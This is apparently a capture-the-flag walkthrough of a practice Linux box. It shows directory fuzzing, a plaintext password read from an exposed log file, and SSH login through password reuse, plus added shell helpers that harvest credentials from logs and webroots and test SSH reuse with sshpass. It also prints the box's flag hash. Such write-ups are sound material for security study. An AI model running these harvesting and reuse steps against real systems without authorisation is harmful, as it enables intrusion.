Pwned Date - 27th July 2022

Enumeration

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.190.211 -w /usr/share/wordlists/dirb/common.txt -q -t 200 
/index.html           (Status: 200) [Size: 10918]
/javascript           (Status: 301) [Size: 323] [--> http://192.168.190.211/javascript/]
/phpmyadmin           (Status: 301) [Size: 323] [--> http://192.168.190.211/phpmyadmin/]
/phpinfo.php          (Status: 200) [Size: 95437]
/robots.txt           (Status: 200) [Size: 30]
/server-status        (Status: 403) [Size: 280]

After some trial and error (every other guess returns 404), only /election is reachable.

Further fuzzing inside /election:

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.190.211/election -w /usr/share/wordlists/dirb/common.txt -q -t 200 
/admin                (Status: 301) [Size: 327] [--> http://192.168.190.211/election/admin/]
/.hta                 (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/.htaccess            (Status: 403) [Size: 280]
/data                 (Status: 301) [Size: 326] [--> http://192.168.190.211/election/data/]
/index.php            (Status: 200) [Size: 7003]
/js                   (Status: 301) [Size: 324] [--> http://192.168.190.211/election/js/]
/languages            (Status: 301) [Size: 331] [--> http://192.168.190.211/election/languages/]
/lib                  (Status: 301) [Size: 325] [--> http://192.168.190.211/election/lib/]
/media                (Status: 301) [Size: 327] [--> http://192.168.190.211/election/media/]
/themes               (Status: 301) [Size: 328] [--> http://192.168.190.211/election/themes/]

Further fuzzing under /election/admin turns up a /logs directory:

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.190.211/election/admin -w /usr/share/wordlists/dirb/common.txt -q -t 200 
/.htaccess            (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/ajax                 (Status: 301) [Size: 332] [--> http://192.168.190.211/election/admin/ajax/]
/.hta                 (Status: 403) [Size: 280]
/components           (Status: 301) [Size: 338] [--> http://192.168.190.211/election/admin/components/]
/css                  (Status: 301) [Size: 331] [--> http://192.168.190.211/election/admin/css/]
/img                  (Status: 301) [Size: 331] [--> http://192.168.190.211/election/admin/img/]
/inc                  (Status: 301) [Size: 331] [--> http://192.168.190.211/election/admin/inc/]
/index.php            (Status: 200) [Size: 8964]
/js                   (Status: 301) [Size: 330] [--> http://192.168.190.211/election/admin/js/]
/logs                 (Status: 301) [Size: 332] [--> http://192.168.190.211/election/admin/logs/]
/plugins              (Status: 301) [Size: 335] [--> http://192.168.190.211/election/admin/plugins/]
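The three gobuster rounds above are the same step repeated one level deeper each time. The helper below (an added example, not part of the original writeup) parses gobuster's 301 lines for the redirect target and feeds each directory back into gobuster, skipping directories that only hold static assets. It assumes gobuster's default dir-mode line format and the wordlist path used above; the asset-directory filter is an assumption.

```shell
#!/bin/sh
# Added example, not from the original writeup: feed each directory gobuster
# reports back into gobuster, automating the rounds shown above.
# Assumes gobuster's default "dir" line format and the wordlist path used above.

# Read gobuster output on stdin and print one URL per 301-redirected
# directory (with or without the <...> that some copies wrap around URLs).
dirs_from_gobuster() {
    sed -n 's/.*(Status: 301).*\[--> *<\{0,1\}\(http[^]>]*\).*/\1/p'
}

# Directories that only hold static assets; not worth a recursive round (assumption).
ASSET_DIRS='/(js|css|img|media|themes|languages|javascript|plugins|components)/$'

# fuzz_recursive URL [DEPTH] [WORDLIST]: fuzz URL, then recurse into every
# directory found, DEPTH levels deep. Raw results are echoed to stderr as they come.
fuzz_recursive() {
    url=$1
    depth=${2:-3}
    wordlist=${3:-/usr/share/wordlists/dirb/common.txt}
    [ "$depth" -gt 0 ] || return 0
    gobuster dir -u "$url" -w "$wordlist" -q -t 50 |
        tee /dev/stderr |
        dirs_from_gobuster |
        grep -vE "$ASSET_DIRS" |
        while read -r sub; do
            fuzz_recursive "$sub" $((depth - 1)) "$wordlist"
        done
}

# Usage (needs network access to the target):
#   fuzz_recursive http://192.168.190.211/ 3
```

Lower the thread count (`-t 50` here instead of 200) when recursing: each level multiplies the request rate, and a saturated target starts returning spurious errors that look like 403s or 404s.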

Inside /election/admin/logs/ there is a system.log file, readable without authentication, that records a plaintext password:

┌──(kali㉿kali)-[~]
└─$ cat system.log 
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).

Exploitation

The log hands us the user love with password P@$$w0rd@123. Those credentials do not work on the web login, so we test them for reuse over SSH instead:

┌──(kali㉿kali)-[~]
└─$ ssh love@192.168.190.211
love@192.168.190.211's password: P@$$w0rd@123

love@election:~$ whoami
love

love@election:~$ cat local.txt
6973c5374338a1f83c3dc9561dfd2787

love@election:~$ sudo -l
[sudo] password for love: P@$$w0rd@123
Sorry, user love may not run sudo on election.

Privilege Escalation

Something is listening on localhost port 3306, the default MySQL/MariaDB port, reachable only from the box itself:

love@election:~$ netstat -tulpn | grep LISTEN
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:43958         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 ::1:43958               :::*                    LISTEN      -                   
tcp6       0      0 ::1:631                 :::*                    LISTEN      -

To find a password for it, look in /var/www/html: the site is a PHP application, so its database credentials must sit in plaintext in a configuration file readable by the web server.
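Both credential finds on this box come from secrets stored in plaintext: the user password in system.log and, next, the database credentials in the PHP source under /var/www/html. The helpers below (an added example, not part of the original writeup) parse the log format seen above into user:password pairs, grep a webroot for hard-coded database settings, and check a pair for SSH reuse. The regexes, the default webroot and the use of sshpass are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original writeup. Patterns and the default
# webroot are assumptions; the log format is the one seen in system.log.

# creds_from_log FILE...: turn "Assigned Password for the user X: Y" lines
# into user:password pairs (ready for a credential-reuse check).
creds_from_log() {
    sed -n 's/.*Assigned Password for the user \([^:]*\): *\(.*\)$/\1:\2/p' "$@"
}

# find_db_creds [WEBROOT]: list lines in PHP/config files that assign or
# define() a setting whose name mentions db, user, pass, pwd or host.
# A PHP app has to store its DB credentials somewhere the web user can read,
# so this is usually the quickest route to the database.
find_db_creds() {
    root=${1:-/var/www/html}
    grep -rniE \
        --include='*.php' --include='*.inc' --include='*.ini' --include='*.env' \
        "define\(['\"]?[a-z_]*(db|user|pass|pwd|host)[a-z_]*['\"]?|\\\$[a-z_]*(db|user|pass|pwd|host)[a-z_]*[[:space:]]*=" \
        "$root" 2>/dev/null
}

# try_ssh_reuse HOST USER:PASS: non-interactive SSH login check (needs sshpass).
# Prints the remote id on success, nothing on failure.
try_ssh_reuse() {
    host=$1
    user=${2%%:*}
    pass=${2#*:}
    sshpass -p "$pass" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 \
        -o PreferredAuthentications=password "$user@$host" 'id' 2>/dev/null
}

# Usage on the box (network and sshpass required for the last step):
#   creds_from_log system.log
#   find_db_creds /var/www/html
#   creds_from_log system.log | while read -r cp; do try_ssh_reuse 192.168.190.211 "$cp"; done
```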